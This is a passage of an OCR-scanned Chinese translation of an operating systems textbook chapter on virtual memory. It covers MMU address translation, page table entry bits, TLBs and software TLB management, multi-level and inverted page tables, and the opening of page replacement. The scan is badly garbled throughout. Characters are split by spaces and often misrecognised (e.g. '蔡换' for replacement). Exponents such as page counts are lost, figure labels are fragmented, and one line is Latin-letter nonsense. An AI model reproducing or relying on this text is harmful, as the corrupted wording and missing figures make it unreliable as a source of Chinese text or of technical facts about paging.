后 把 虚拟 页 面 8 的 表 项 的 又 号 改 为 1， 因 此 在 引起 陷阱 的 指令 重新 启动 
时 ， 它 将 把 虚拟 地 址 32780 映 射 为 物理 地 址 4108 (4096+12) 。 


下 面 查看 一 下 MMU 的 内 部 结构 以 便 了 解 它 是 怎么 工作 的 ， 以 及 了 
解 为 什么 我 们 选用 的 页 面 大 小 都 是 2 的 整数 次 守 。 在 图 3-10 中 可 以 看 到 
一 个 虚拟 地 址 的 例子 ， 虚 拟 地 址 8196 (二 进 制 是 0010000000000100) 用 
图 3-9 所 示 的 MMU 映 射 机 制 进行 映射 ， 输 入 的 16 位 虚拟 地 址 被 分 为 4 位 
的 页 号 和 12 位 的 偏 移 量 。4 位 的 页 号 可 以 表示 16 个 页 面 ，12 位 的 偏 移 可 
以 为 一 页 内 的 全 部 4096 个 字 节 编 址 。 
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图 3-10 在 16 个 4KB 页 面 情况 下 MMU 的 内 部 操作 


可 用 页 号 作为 页 表 (page table) 的 索引 ， 以 得 出 对 应 于 该 虚拟 页 面 
的 页 框 写 。 如 果 “ 在 /不 在 ”位 是 0， 则 将 引起 一 个 操作 系统 陷阱 。 如 采访 
位 是 1， 则 将 在 页 表 中 碍 到 的 页 框 号 复制 到 输出 寄存 融 的 高 3 位 中 ， 再 加 





上 输入 虚拟 地 址 中 的 低 12 位 偏 移 量 。 如 此 就 构成 了 15 位 的 物理 地 址 。 输 
出 寄存 右 的 内 容 随即 被 作为 物理 地 址 送 到 内 存 忌 线 。 


3.3.2 hk 


作为 一 种 最 简单 的 实现 ， 虚 拟 地 址 到 物理 地 址 的 映射 可 以 概括 如 
F: 虚拟 地 址 被 分 成 虚拟 页 号 《高 位 部 分 ) 和 偏 移 量 〈 低 位 部 分 ) 两 部 
分 。 例 如 ， 对 于 16 位 地 址 和 4KB 的 页 面 大 小 ， 高 4 位 可 以 指定 16 个 虚拟 
页 面 中 的 一 页 ， 而 低 12 位 接着 确定 了 所 选 页 面 中 的 字 节 偏 移 量 〈0 一 
4095) 。 但 是 使 用 3 或 者 5 或 者 其 他 位 数 拆 分 虚拟 地 址 也 是 可 行 的 。 不 同 
的 划分 对 应 不 同 的 页 面 大 小 。 





虚拟 页 号 可 用 做 页 表 的 索引 ， 以 找到 该 虚拟 页 面 对 应 的 页 表 项 。 由 
页 表 项 可 以 找到 页 框 号 〈 如 果 有 的 话 ) 。 然 后 把 页 框 号 拼接 到 偏 移 量 的 
局 位 端 ， 以 蔡 换 掉 虚 拟 页 号 ， 形 成 送 往 内 存 的 物理 地 址 。 


页 表 的 目的 是 把 虚拟 页 面 映射 为 页 框 。 从 数学 角度 说 ， 页 表 是 一 个 
函数 ， 它 的 参数 是 虚拟 页 号 ， 结 果 是 物理 页 框 号 。 通 过 这 个 函数 可 以 把 
虚拟 地 址 中 的 虚拟 页 面 域 蔡 换 成 页 框 域 ， 从 而 形成 物理 地 址 。 





页 表 项 的 结构 


下 面 将 讨论 单个 页 表 项 的 细 市 。 页 表 项 的 结构 是 与 机 恬 密切 相关 
的 ， 但 不 同 机 器 的 页 表 项 存储 的 信息 部 大 臻 相同。 图 3-11 中 给 出 了 页 表 
项 的 一 个 例子 。 不 同 计算 机 的 页 表 项 大 小 可 能 不 一 样 ， 但 32 位 是 一 个 常 


用 的 大 小 。 最 重要 的 域 是 页 框 号 。 毕 竟 页 映射 的 目的 是 找到 这 个 值 ， 其 
次 是 “在 /不 在 ”位 ， 这 一 位 是 1 时 表示 该 表 项 是 有 效 的 ， 可 以 使 用 ， 如 宋 
是 0， 则 表示 该 表 项 对 应 的 虚拟 页 面 现在 不 在 内 存 中 ， 访 问 该 页 面 会 引 
起 一 个 缺 页 中 断 。 


























ERI 
禁止 位 ”修改 位 “在 /不 在 ”位 


/ 


页 框 号 





访问 位 ”保护 位 
图 3-11 一 个 典型 的 页 表 项 


“保护 ”(protection) 位 指出 一 个 页 允许 什么 类 型 的 访问 。 最 简单 的 
形式 是 这 个 域 只 有 一 位 ，0 表 示 读 / 写 ，1 表 示 只 读 。 一 个 更 先进 的 方法 
是 使 用 三 位 ， 各 位 分 别 对 应 是 否 局 用 读 、 写 、 执 行 该 页 面 。 








为 了 记录 页 面 的 使 用 状况 ， 引 入 了 “修改 ”(modified) 位 和 “ 访 
问 ”(referenced) 位 。 在 写 入 一 页 时 由 人 硬件 自动 设置 修改 位 。 该 位 在 操 
作 系 统 重 新 分 配 页 框 时 是 非常 有 用 的 。 如 果 一 个 页 面 已 经 被 修改 过 《〈 即 
它 是 “ 脏 ? 的 ) ， 则 必须 把 它 写 回 磁 盘 。 如 采 一 个 页 面 没有 被 修 改过 《〈 即 
它 是 “干净 ”的 ) ， 则 只 简单 地 把 它 丢 弃 就 可 以 了 ， 因 为 它 在 磁盘 上 的 副 
本 仍然 是 有 效 的。 这 一 位 有 时 也 被 称 为 脏 位 dirty bit) ， 因 为 它 反 映 了 








该 页 面 的 状态 。 





不 论 是 读 还 是 写 ， 系 统 都 会 在 该 页 面 被 访问 时 设置 访问 位 。 它 的 值 
被 用 来 帮助 操作 系统 在 发 生 缺 页 中 断 时 选择 要 被 淘汰 的 页 面 。 不 再 使 用 
的 页 面 要 比 正 在 使 用 的 页 面 更 适合 淘汰 。 这 一 位 在 即将 讨论 的 很 多 页 面 
置换 算法 中 者 会 起 到 重要 的 作用 。 





最 后 一 位 用 于 茶 止 该 页 面 被 高 速 缓存 。 对 那些 映射 到 设备 寄存 髓 而 
不 是 常规 内 存 的 页 面 而 言 ， 这 个 特性 是 非常 重要 的 。 假 如 操作 系统 正在 
紧张 地 循环 等 待 茶 个 IO 设备 对 它 刚 发 出 的 命令 作出 啊 应 ， 保 证 硬件 是 
不 断 地 从 设备 中 读 取 数 据 而 不 是 访问 一 个 旧 的 被 高 速 缓存 的 副本 是 非常 
重要 的 。 通 过 这 一 位 可 以 禁止 高 速 缓存 。 有 具有 独立 的 MO 空间 而 不 使 用 
内 存 映 射 TO 的 机 需 不 需要 这 一 位 。 














应 该 注意 的 是 ， 知 东 个 页 面 不 在 内 存 时 ， 用 于 保存 该 页 面 的 磁盘 地 
址 不 是 页 表 的 一 部 分 。 原 因 很 简单 ， 页 表 只 保存 把 虚拟 地 址 转换 为 物理 
地 址 时 人 硬件 所 需要 的 信息 。 操 作 系 统 在 处 理 缺 页 中 断 时 需要 把 该 页 面 的 
磁盘 地 址 等 信息 保存 在 操作 系统 内 部 的 软件 表格 中 。 硬 件 不 需要 它 。 





在 深入 到 更 多 应 用 实现 问题 之 前 ， 值 得 再 次 强调 的 是 ， 虚拟 内 存 本 
质 上 是 用 来 创造 一 个 新 的 抽象 概念 一 一 地 址 空间 ， 这 个 概念 是 对 物理 内 
存 的 抽象 ， 类 似 于 进程 是 对 物理 机 器 〈CPU) 的 抽象 。 虚 拟 内 存 的 实 
现 ， 征 将 虚拟 地 址 空间 分 解 成 页 ， 并 将 每 一 页 映射 到 物理 内 存 的 茶 个 页 





HEB CIT) 解除 映射 。 因 此 ， 本 章 的 基本 和 内 容 即 关 于 操作 系统 创建 
的 抽象 ， 以 及 如 何 管 理 这 个 抽象 。 


3.3.3 ”加 速 分 页 过 程 


我 们 已 经 了 解 了 虚拟 内 存 和 分 页 的 基础 。 现 在 是 时 候 深 入 到 更 多 关 
于 可 能 的 实现 的 细节 中 去 了 。 在 任何 分 页 式 系统 中 ， 都 需要 考虑 两 个 主 


要 问题 : 
1) 虚 拟 地 址 到 物理 地 址 的 映射 必须 非常 快 。 


2) 如 果 虚 拟 地 址 空间 很 大 ， 页 表 也 会 很 大 。 





第 一 个 问题 是 由 于 每 次 访问 内 存 ， 痢 需要 进行 虚拟 地 址 到 物理 地 址 
的 映射 。 所 有 的 指令 最 终 都 必须 来 目 内 存 ， 并 且 很 多 指令 也 会 访问 内 存 
中 的 操作 数 。 因 此 ， 每 条 指令 进行 一 两 次 或 更 多 页 表 访 问 是 必要 的 。 如 
果 执 行 一 条 指令 需要 lns， 页 表 人 查询 必须 在 0.2ns 之 内 完成 ， 以 避免 映射 
成 为 一 个 主要 瓶颈 。 








第 二 个 问题 来 自 现代 计算 机 使 用 至 少 32 位 的 虚拟 地 址 ， 而 且 64 位 变 
得 越 来 越 普遍 。 假 设 页 长 为 4KB，32 位 的 地 址 空间 将 有 100 万 页 ， 而 64 
位 地 址 空间 简直 多 到 超 乎 你 的 想象 。 如 果 虚 拟 地 址 空间 中 有 100 万 个 
页 ， 那 么 页 表 必 然 有 100 万 条 表 项 。 另 外 请 记 住 ， 每 个 进程 都 需要 自己 
的 页 表 《 因 为 它 有 自己 的 虚拟 地 址 空间 ) 。 

















对 大 而 快速 的 页 映射 的 需求 成 为 了 构建 计算 机 的 重要 约束 。 最 简单 


的 设计 《至 少 从 概念 上 ) 是 使 用 由 一 组 “快速 硬件 寄存 器 ?组 成 的 单一 页 
表 ， 每 一 个 表 项 对 应 一 个 虚 页 ， 虚 页 号 作为 索引 ， 如 图 3-10 所 示 。 当 局 
动 一 个 进程 时 ， 操 作 系统 把 保存 在 内 存 中 的 进程 页 表 的 副本 载 入 到 寄存 
堪 中 。 在 进程 运行 过 程 中 ， 不 必 再 为 页 表 而 访问 骨 存 。 这 个 方法 的 优势 
古 简单 并 且 在 映射 过 程 中 不 需要 访问 内 存 。 而 缺点 是 在 页 表 很 大 时 ， 代 
价 高 昂 。 而 且 每 一 次 上 下 文 切换 都 必须 帮 载 整个 页 表 ， 这 样 会 降低 性 























允 一 种 极 问 方法 是 ， 整 个 页 表 都 在 彤 存 中 。 那 时 所 需 的 人 硬件 仅仅 是 
一 个 指向 页 表 起 始 位 置 的 寄存 器 。 这 样 的 设计 使 得 在 上 下 文 切换 时 ， 进 
行 “虚拟 地 址 到 物理 地 址 ”的 映射 只 需 重 新 闭 入 一 个 寄存 顺 。 当 然 ， 这 种 
做 法 的 缺陷 是 在 执行 每 条 指令 时 ， 孝 需要 一 次 或 多 次 内 存 访 问 ， 以 完成 


页 表 项 的 读 入 ， 速 度 非 常 慢 。 





1. 转 换 检测 缓冲 区 


现在 讨论 加 速 分 页 机 制 和 处 理 大 的 虚拟 地 址 空间 的 实现 方案 ， 先 介 
绍 加 速 分 页 问题 。 大 多 数 优化 技术 都 是 从 内 存 中 的 页 表 开 始 的 。 这 种 设 
计 对 效率 有 着 巨大 的 影响 。 例 如 ， 假 设 一 条 指令 要 把 一 个 寄存 器 中 的 数 
据 复制 到 另 一 个 寄存 器 。 在 不 分 页 的 情况 下 ， 这 条 指令 只 访问 一 次 内 
存 ， 即 从 内 存 中 取 指 令 。 有 了 分 页 后 ， 则 因为 要 访问 页 表 而 引起 更 多 次 
的 访问 内 存 。 由 于 执行 速度 通常 被 CPU 从 内 存 中 取 指 令 和 数据 的 速度 所 
限制 ， 所 以 每 次 内 存 访问 必须 进行 两 次 页 表 访 问 会 降低 一 半 的 性 能 。 在 














这 种 情况 下 ， 没 人 会 采用 分 页 机 制 。 





多 年 以 来 ， 计 算 机 的 设计 者 已 经 意识 到 了 这 个 问题 ， 并 找到 了 一 种 
解决 方案 。 这 种 解决 方案 的 建立 基于 这 样 一 种 现象 : 大 多 数 程序 总 是 对 
少量 的 页 面 进行 多 次 的 访问 ， 而 不 是 相反 的 。 因 此 ， 只 有 很 少 的 页 表 项 
会 被 反复 读 取 ， 而 其 他 的 页 表 项 很 少 被 访问 。 





上 面 提 到 的 解决 方案 是 为 计算 机 设置 一 个 小 型 的 硬件 设备 ， 将 虚拟 
地 址 直接 映射 到 物理 地 址 ， 而 不 必 再 访问 页 表 。 这 种 设备 称 为 转换 检测 
缓冲 区 (Translation Lookaside Buffer, TLB) ， 有 时 又 称 为 相 联 存储 器 





Cassociate memory) ， 如 图 3-12 所 示 。 它 通常 在 MMU 中 ， 包 含 少 量 的 
表 项 ， 在 此 例 中 为 8 个 ， 在 实际 中 很 少 会 超过 64 个 。 每 个 表 项 记录 了 一 
个 页 面 的 相关 信息 ， 包 括 虚 拟 页 号 、 页 面 的 修改 位 、 保 护 码 〈 读 / 写 / 执 
行 权 限 ) 和 该 页 所 对 应 的 物理 页 框 。 除 了 虚拟 页 号 〈 不 是 必须 放 在 页 表 
中 的 ) ， 这 些 域 与 页 表 中 的 域 是 一 一 对 应 的 。 另 外 还 有 一 位 用 来 记录 这 
个 表 项 是 否 有 效 〈 即 是 否 在 使 用 ) 。 














如 果 一 个 进程 在 虚拟 地 址 19、20 和 21 之 间 有 一 个 循环 ， 那 么 可 能 会 
生成 图 3-12 中 的 TLB。 因 此 ， 这 三 个 表 项 中 有 可 读 和 可 执行 的 保护 码 。 
当前 主要 使 用 的 数据 《假设 是 个 数组 ) 放 在 页 面 129 和 页 面 130 中 。 页 面 
140 包 含 了 用 于 数组 计算 的 索引 。 了 节 后 ， 堆 栈 位 于 页 面 860 和 页 面 861。 








保护 位 








有 效 位 ”虚拟 页 面 号 











页 框 号 
31 
38 











图 3-12 TILB 加 速 分 页 


现在 看 一 下 TLB 是 如 何 工作 的 。 将 一 个 虚拟 地 址 放 入 MMU 中 进行 
转换 时 ， 人 硬件 首先 通过 将 该 虚拟 页 号 与 TILB 中 所 有 表 项 同时 《〈 即 并 行 ) 
进行 匹配 ， 判 断 虚 拟 页 面 是 否 在 其 中 。 如 果 发 现 了 一 个 有 效 的 匹配 并 且 
要 进行 的 访问 操作 并 不 违反 保护 位 ， 则 将 页 框 号 直接 从 TLB 中 取出 而 不 
必 再 访问 页 表 。 如 果 虚 拟 页 面 号 确实 是 在 TLB 中 ， 但 指令 试图 在 一 个 只 
读 页 面 上 进行 写 操作 ， 则 会 产生 一 个 保护 错误 ， 就 像 对 页 表 进 行 非法 访 
问 一 样 。 








当 虚 拟 页 号 不 在 TLB 中 时 发 生 的 事情 值得 讨论 。 如 果 MMU 检 测 到 
没有 有 效 的 匹配 项 时 ， 就 会 进行 正常 的 页 表 查 询 。 接 着 从 TLB 中 淘汰 一 
个 表 项 ， 然 后 用 新 找到 的 页 表 项 代 蔡 它 。 这 样 ， 如 果 这 一 页 面 很 快 再 被 
访问 ， 第 二 次 访问 TLB 时 自然 将 会 命中 而 不 是 不 命中 。 当 一 个 表 项 被 清 











除 出 TLB 时 ， 将 修改 位 复制 到 内 存 中 的 页 表 项 ， 而 除了 访问 位 ， 其 他 的 
值 不 变 。 当 页 表 项 中 从 页 表 装 入 到 TLB 中 时 ， 所 有 的 值 都 来 自 内 存 。 





2. 软 件 TLB 管 理 


到 目前 为 止 ， 我 们 已 经 假设 每 一 台 具 有 虚拟 内 存 的 机 器 都 具有 由 便 
件 识 别 的 页 表 ， 以 及 一 个 TLB。 在 这 种 设计 中 ， 对 TLB 的 管理 和 TLB 的 
失效 处 理 都 完全 由 MMU 硬 件 来 实现 。 只 有 在 内 存 中 没有 找到 某 个 页 面 
时 ， 才 会 陷入 到 操作 系统 中 。 


在 过 去 ， 这 样 的 假设 是 正确 的 。 但 是 ， 许 多 现代 的 RISC 机 器 ， 包 
括 SPARC、MIPS 以 及 HP PA， 几 乎 所 有 的 页 面 管理 都 是 在 软件 中 实现 
的 。 在 这 些 机 器 上 ，TLB 表 项 被 操作 系统 显 式 地 装载 。 当 发 生 TLB 访 问 
失效 ,不 再 是 由 MMU 到 页 表 中 查找 并 取出 需要 的 页 表 项 ， 而 是 生成 一 
个 TLB 失 效 并 将 问题 交 给 操作 系统 解决 。 系 统 必 须 先 找 到 该 页 面 ， 然 后 
从 TLB 中 删除 一 个 项 ， 接 着 装载 一 个 新 的 项 ， 最 后 再 执行 先前 出 错 的 指 
令 。 当 然 ， 所 有 这 一 切 都 必须 在 有 限 的 几 条 指令 中 完成 ， 因 为 TLB 失 效 
比 缺 页 中 断 发 生 的 更 加 频繁 。 





让 人 感到 惊奇 的 是 ， 如 果 TLB 大 《〈 如 64 个 表 项 ) 到 可 以 减少 失效 率 
时 ，TLB 的 软件 管理 就 会 变 得 足够 有 效 。 这 种 方法 的 最 主要 的 好 处 是 获 
得 了 一 个 非常 简单 的 MMU， 这 就 在 CPU 必 片 上 为 高 速 缓存 以 及 其 他 改 
善 性 能 的 设计 腾 出 了 相当 大 的 空间 。Uhlig 等 人 在 论文 (Uhlig，1994) 





中 讨论 过 软件 ITLB 管 理 。 


到 目前 为 止 ， 已 经 开发 了 多 种 不 同 的 策略 来 改善 使 用 软件 TLB 管 理 
的 机 器 的 性 能 。 其 中 一 种 策略 是 在 减少 ITILB 失 效 的 同时 ， 又 要 在 发 生 
TLB 失 效 时 减少 处 理 开 销 〈Bala 等 人 ，1994) 。 为 了 减少 TLB 失 效 ， 有 
时 候 操作 系统 能 用 “直觉 ?指出 哪些 页 面 下 一 步 可 能 会 被 用 到 并 预先 为 它 
们 在 TLB 中 装载 表 项 。 例 如 ， 当 一 个 客户 进程 发 送 一 条 消息 给 同一 台 机 
器 上 的 服务 器 进程 ， 很 可 能 服务 器 将 不 得 不 立即 运行 。 了 解 了 这 一 点 ， 
当 执 行 处 理 send 的 陷阱 时 ， 系 统 也 可 以 找到 服务 器 的 代码 页 、 数 据 页 以 
及 堆栈 页 ， 并 在 有 可 能 导致 TLB 失 效 前 把 它们 装载 到 TLB 中 。 








无 论 是 用 硬件 还 是 用 软件 来 处 理 TLB 失 效 ， 常 见方 法 都 是 找到 页 表 
并 执行 索引 操作 以 定位 将 要 访问 的 页 面 。 用 软件 做 这 样 的 搜索 的 问题 
是 ， 页 表 可 能 不 在 TLB 中 ， 这 就 会 导致 处 理 过 程 中 的 额外 的 TLB 失 效 。 
可 以 通过 在 内 存 中 的 固定 位 置 维护 一 个 大 的 “如 4KB) TLB 表 项 的 软件 
高 速 缓存 〈 该 高 速 缓存 的 页 面 总 是 被 保存 在 TLB 中 ) 来 减少 TLB 失 效 。 
通过 首先 检查 软件 高 速 缓存 ， 操 作 系 统 能 够 实质 性 地 减少 TLB 失 效 。 

















当 使 用 软件 TLB 管 理 时 ， 一 个 基本 要 求 是 要 理解 两 种 不 同 的 TLB 失 
效 的 区 别 在 哪里 。 当 一 个 页 面 访问 在 内 存 中 而 不 在 TLB 中 时 ， 将 产生 软 
失效 (soft miss) 。 那 么 此 时 所 要 做 的 就 是 更 新 一 下 TLB， 不 需要 产生 
磁盘 IO。 典 型 的 处 理 需 要 10 一 20 个 机 器 指令 并 花费 几 个 纳 秒 完成 操 
作 。 相 反 ， 当 页 面 本 身 不 在 内 存 中 当然 也 不 在 TLB 中 ) 时 ， 将 产生 硬 








失效 。 此 刻 需 要 一 次 磁盘 存 取 以 装 入 该 页 面 ， 这 个 过 程 


秒 。 硬 失效 的 处 理 时 间 往 往 是 软 失效 的 百 万 倍 。 


3.3.4 针对 大 内 存 的 页 表 


在 原 有 的 内 存 页 表 的 方案 之 上 ， 引 入 快 表 (TLB) 可 以 用 来 加 快 虚 
拟 地 址 到 物理 地 址 的 转换 。 不 过 这 不 是 惟一 需要 解决 的 问题 ， 另 一 个 问 
题 是 怎样 处 理 巨大 的 虚拟 地 址 空间 。 下 面 将 讨论 两 种 解决 方法 。 


1. 多 级 页 表 


第 一 种 方法 是 采用 多 级 页 表 。 一 个 简单 的 例子 如 图 3-13 所 示 。 在 图 
3-13a 中 ，32 位 的 虚拟 地 址 被 划分 为 10 位 的 PT1 域 、10 位 的 PT2 域 和 12 位 
的 Offset〔( 偏 移 量 ) 域 。 因 为 偏 移 量 是 12 位 ， 所 以 页 面 长 度 是 4KB， 共 


有 2 个 页 面 。 











引入 多 级 页 表 的 原因 是 避免 把 全 部 页 表 一 直 保 存在 内 存 中 。 特 别 是 
那些 从 不 需要 的 页 表 就 不 应 该 保留 。 比 如 一 个 需要 12MB 内 存 的 进程 ， 
其 最 底 端 是 4MB 的 程序 正文 段 ， 后 面 是 4MB 的 数据 段 ， 顶 病 是 4MB 的 堆 
栈 段 ， 在 数据 段 上 方 和 堆栈 段 下方 之 间 是 大 量 根本 没有 使 用 的 空闲 区 。 





考察 图 3-13b 例 子 中 的 二 级 页 表 是 如 何 工 作 的 。 在 左边 是 顶级 页 
表 ， 它 具有 1024 个 表 项 ， 对 应 于 10 位 的 PT1 域 。 当 一 个 虚拟 地 址 被 送 到 
MMU 时 ，MMU 首 先 提 取 PT1 域 并 把 该 值 作为 访问 项 级 页 表 的 索引 。 因 
为 整个 4GB 〈32 位 ) 虚拟 地 址 空间 已 经 被 分 成 1024 个 4MB 的 块 ， 所 以 这 





1024 个 表 项 中 的 每 一 个 都 表示 4MB 的 虚拟 地 址 空间 。 


内 存 顶部 
4MB 的 页 表 


位 10 10 12 


a) 





b) 


图 313 一 个 有 两 个 页 表 域 的 32 位 地 位 ; b) 二 级 页 表 


由 索引 顶级 页 表 得 到 的 表 项 中 含有 二 级 页 表 的 地 址 或 页 框 号 。 顶 级 
页 表 的 表 项 0 指向 程序 正文 的 页 表 ， 表 项 1 指 癌 数据 的 页 表 ， 表 项 1023 指 
加 堆栈 的 页 表 ， 其 他 的 表 项 (用 阴影 表示 的 ) 未 用 。 现 在 把 PT2 域 作为 
访问 选 定 的 二 级 页 表 的 索引 ， 以 便 找到 该 虚拟 页 面 的 对 应 页 框 号 。 





下 面 看 一 个 示例 ， 考 虑 32 位 虚拟 地 址 0x00403004《〈 十 进 制 4 206 
596) 位 于 数据 部 分 12 292 字 节 处 。 它 的 虚拟 地 址 对 应 PT1=1，PT2=2， 
Offset=4。MMU 首 先 用 PT1 作 为 索引 访问 顶级 页 表 得 到 表 项 1， 它 对 应 
的 地 址 范围 是 4M 一 8M。 然 后 ， 它 用 PT2 作 为 索引 访问 刚刚 找到 的 二 级 
页 表 并 得 到 表 项 3， 它 对 应 的 虚拟 地 址 范围 是 在 它 的 4M 块 内 的 12 288 一 
16 383〔 即 绝对 地 址 4 206 592~4 210 687) 。 这 个 表 项 含有 虚拟 地 址 
0x00403004 所 在 页 面 的 页 框 号 。 如 果 该 页 面 不 在 内 存 中 ， 页 表 项 中 
的 “在 /不 在 ?位 将 是 0， 引 发 一 次 缺 页 中 断 。 如 果 该 页 面 在 内 存 中 ， 从 二 
级 页 表 中 得 到 的 页 框 号 将 与 偏 移 量 (4) 结合 形成 物理 地 址 。 该 地 址 被 
放 到 总 线 上 并 送 到 内 存 中 。 


























值得 注意 的 是 ， 虽 然 在 图 3-13 中 虚拟 地 址 空间 超过 100 万 个 页 面 ， 

实际 上 只 需要 四 个 页 表 : 顶级 页 表 以 及 0 一 4M EXE) ~ 4M~ 

8M《〈 数 据 段 ) 和 顶端 4M 〈 堆 栈 段 〉 的 二 级 页 表 。 顶 级 页 表 中 1021 个 表 
项 的 “在 /不 在 ”位 都 被 设 为 0， 当 访问 它们 时 强制 产生 一 个 缺 页 中 断 。 如 
果 发 生 了 这 种 情况 ， 操 作 系统 将 注意 到 进程 正在 试图 访问 一 个 不 希望 被 
访问 的 地 址 ， 并 采取 适当 的 行动 ， 比 如 向 进程 发 出 一 个 信号 或 杀 死 进程 
等 。 在 这 个 例子 中 的 各 种 长 度 选择 的 都 是 整数 ， 并 且 选 择 PT1 与 PT2 等 
长 ， 但 在 实际 中 也 可 能 是 其 他 的 值 。 











图 3-13 所 示 的 二 级 页 表 可 扩充 为 三 级 、 四 级 或 更 多 级 。 级 别 越 多 ， 
灵活 性 就 越 大 ， 但 页 表 超 过 三 级 会 带 来 更 大 的 复杂 性 ， 这 样 做 是 售 值 得 


令 人 怀疑 。 


2. 倒 排 页 表 





对 32 位 虚拟 地 址 空间 ， 多 级 页 表 可 以 很 好 地 发 挥 作用 。 但 是 ， 随 着 
64 位 计算 机 变 得 更 加 普遍 ， 情 况 发 生 了 彻底 的 变化 。 如 果 现 在 的 地 址 空 
间 是 2% 字 节 ， 页 面 大 小 为 4KB， 我 们 需要 一 个 有 2”” 个 表 项 的 页 表 。 如 
果 每 一 个 表 项 8 个 字 节 ， 那 么 整个 页 表 束 会 超过 3000 万 GB (30PB) 。 仅 
仅 为 页 表 耗 费 3000 万 GB 不 是 个 好 主意 (现在 不 是 ， 可 能 以 后 几 年 也 不 
) 。 因 而 ， 具 有 64 位 分 页 虚拟 地 址 空间 的 系统 需要 一 个 不 同 的 解决 方 








是 
Ro 
解决 方案 之 一 就 是 使 用 倒 排 页 表 Cinverted page table) 。 在 这 种 设 
计 中 ， 在 实际 内 存 中 每 一 个 页 框 有 一 个 表 项 ， 而 不 是 每 一 个 虚拟 页 面 有 
一 个 表 项 。 例 如 ， 对 于 64 位 虚拟 地 址 ，4KB 的 页 ，1GB 的 RAM， 一 个 倒 
排 页 表 仅 需要 262 144 个 页 表 项 。 表 项 记录 哪 一 个 (进程 ， 虚 拟 页 面 ) 


对 定位 于 该 页 框 。 











虽然 倒 排 页 表 节 省 了 大 量 的 空间 《至 少 当 虚拟 地 址 空间 比 物理 内 存 
大 得 多 的 时 候 是 这 样 的 ) ， 但 它 也 有 严重 的 不 足 : 从 虚拟 地 址 到 物理 地 
址 的 转换 会 变 得 很 困难 。 当 进程 n 访 问 虚拟 页 面 p 时 ， 便 件 不 再 能 通过 把 
p 当 作 指 向 页 表 的 一 个 索引 来 查找 物理 页 框 。 取 而 代 之 的 是 ， 它 必须 搜 
索 整 个 倒 排 页 表 来 得 找 东 一 个 表 项 (n，p) 。 此 外 ， 该 搜索 必须 对 每 一 








个 内 存 访问 操作 都 要 执行 一 次 ， 而 不 仅仅 是 在 发 生 缺 页 中 断 时 执行 。 每 
一 次 内 存 访问 操作 都 要 查找 一 个 256K 的 表 是 不 会 让 你 的 机 器 运行 得 很 
快 的 。 


走出 这 种 两 难 局 面 的 办 法 是 使 用 TLB。 如 果 TLB 能 够 记录 所 有 频繁 
使 用 的 页 面 ， 地 址 转换 就 可 能 变 得 像 通 币 的 页 表 一 样 快 。 但 是 ， 当 发 生 
TLB 失 效 时 ， 需 要 用 软件 搜索 整个 倒 排 页 表 。 一 个 可 行 的 实现 该 搜索 的 
方法 是 建立 一 张 散 列 表 ， 用 虚拟 地 址 来 散 列 。 当 前 所 有 在 内 存 中 的 具有 
相同 散 列 值 的 虚拟 页 面 被 链接 在 一 起 ， 如 图 3-14 所 示 。 如 末 散 列表 中 的 
权 数 与 机 器 中 物理 页 面 数 一 样 多 ， 那 么 散 列 表 的 冲突 链 的 平均 长 度 将 会 
征 1 个 表 项 ， 这 将 会 大 大 提高 映射 速度 。 一 旦 页 框 号 被 找到 ， 新 的 〈 虚 
拟 页 号 ， 物 理 页 框 号 ) 对 就 会 被 装载 到 TLB 中 。 








传统 页 表 ， 每 页 一 个 
页 表 项 ， 共 2? 个 页 面 


252 1 Fo 
1GB 物 理 内 存 有 
28 个 4KB 页 框 散 列 表 


28-1 218 1 一 一 


a g] 


以 虚拟 页 面 对 虚拟 页 面 进 行 散 列 v 
作为 索引 计算 ， 并 作为 索引 MB SH 
页 面 





图 3-14 传统 页 表 与 倒 排 页 表 的 对 比 





倒 排 页 表 在 64 位 机 器 中 很 常见 ， 因 为 在 64 位 机 器 中 即使 使 用 了 大 页 
面 ， 页 表 项 的 数量 还 是 很 庞大 的 。 例 如 ， 对 于 4MB 页 面 和 64 位 虚拟 地 
址 ， 需 要 2 个 页 表 项 。 处 理 大 虚 存 的 其 他 方法 可 参见 Talluri 等 人 的 论 
文 (1995) 。 


3.4 ”页 面前 换算 法 


当 发 生 缺 页 中 断 时 ， 操 作 系 统 必须 在 内 存 中 选择 一 个 页 面 将 其 换 出 
内 存 ， 以 便 为 即将 调 入 的 页 面 腾 出 空间 。 如 果 要 换 出 的 页 面 在 内 存 驻 留 
期 间 己 经 被 修改 过 ， 就 必须 把 它 写 回 磁盘 以 更 新 该 页 面 在 磁盘 上 的 副 
本 ; 如果 该 页 面 没有 被 修改 过 《如 一 个 包 合 程序 正文 的 页 面 ) ， 那 么 它 
在 人 磁盘 上 的 副本 已 经 是 最 新 的 ， 不 需要 回 写 。 直 接 用 调 入 的 页 面 履 盖 挥 
被 淘汰 的 页 面 束 可 以 了 。 











当 发 生 缺 页 中 断 时 ， 虽 然 可 以 随机 地 选择 一 个 页 面 来 置换 ， 但 是 如 
果 每 次 部 选择 不 党 使 用 的 页 面 会 提升 系统 的 性 能 。 如 果 一 个 被 频繁 使 用 
的 页 面 被 置换 出 内 存 ， 很 可 能 它 在 很 短 时 间 内 又 要 被 调 入 内 存 ， 这 会 种 
来 不 必要 的 开销 。 人 们 已 经 从 理论 和 实践 两 个 方面 对 页 面 置换 算法 进行 
了 深入 的 研究 。 下 面 我 们 将 介绍 几 个 最 重要 的 算法 。 





有 必要 指出 , “页 面 置换 ?问题 在 计算 机 设计 的 其 他 领域 中 也 会 同样 
发 生 。 例 如 ， 多 数 计算 机 把 最 近 使 用 过 的 32 字 节 或 64 字 市 的 存储 块 保存 
在 一 个 或 多 个 高 速 缓存 中 。 当 这 些 高 速 缓存 存 满 之 后 就 必须 选择 一 些 块 
E. BRS FERN TABOR SP CA ERED UE a FADEREN, TM ANE 
像 页 面 置换 那样 在 微 秒 级 上 完成 ) ， 这 个 问题 同 页 面 置换 问题 完全 一 
样 。 之 所 以 花费 时 间 较 短 ， 其 原因 是 丢掉 的 高 速 缓存 块 可 以 从 内 存 中 获 
得 ， 而 内 存 既 没有 寻 道 时 间 也 不 存在 旋转 延迟 。 























第 二 个 例子 是 web 服务 器 。 服 务 器 可 以 把 一 定数 量 的 经 常 访 问 的 
Web 页 面 存放 在 存储 器 的 高 速 缓存 中 。 但 是 ， 当 存储 器 高 速 缓存 已 满 并 
且 要 访问 一 个 不 在 高 速 缓存 中 的 页 面 时 ， 束 必须 要 置换 高 速 缓存 中 的 某 
个 web 页 面 。 由 于 在 高 速 缓存 中 的 Web 页 面 不 会 被 修改 ， 因 此 在 磁盘 中 
